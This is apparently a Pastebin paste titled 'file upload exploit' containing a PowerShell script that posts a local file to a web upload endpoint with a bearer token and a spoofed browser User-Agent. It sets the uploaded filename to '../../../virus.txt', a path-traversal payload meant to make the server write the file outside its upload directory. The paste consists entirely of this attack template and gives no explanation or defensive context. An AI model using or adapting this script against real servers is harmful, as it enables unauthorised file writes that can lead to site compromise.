Guest User

file upload exploit

a guest
Mar 10th, 2020
252
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $url = "url/uploads";
  2. $targetFileName = "../../../virus.txt";
  3. $sourceFilePath = "C:\temp\ipaddrs.txt"
  4.  
  5. $access_token = "Bearer XXXXXXXX"
  6.  
  7. $file_bytes = [System.IO.File]::ReadAllBytes($sourceFilePath)
  8. [System.Net.Http.HttpClient]$httpClient = New-Object System.Net.Http.HttpClient;
  9. [System.Net.Http.MultipartFormDataContent]$form = New-Object System.Net.Http.MultipartFormDataContent;
  10.  
  11. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Accept", "application/json, text/plain, */*") | out-null
  12. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Authorization", $access_token)  | out-null
  13. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36")  | out-null
  14. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Accept-Language", "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7") | out-null
  15.  
  16. [System.Net.Http.ByteArrayContent]$byteContent = new-object System.Net.Http.ByteArrayContent([byte[]]($file_bytes), 0, $file_bytes.Length)
  17.  
  18. $form.Add($byteContent, "file[]",$targetFileName)
  19. $response = [System.Net.Http.HttpResponseMessage]$response = $httpClient.PostAsync($url, $form).Result
  20. $sd = $response.Content.ReadAsStringAsync().Result
  21. $sd | fl *
  22. $httpClient.Dispose()
RAW Paste Data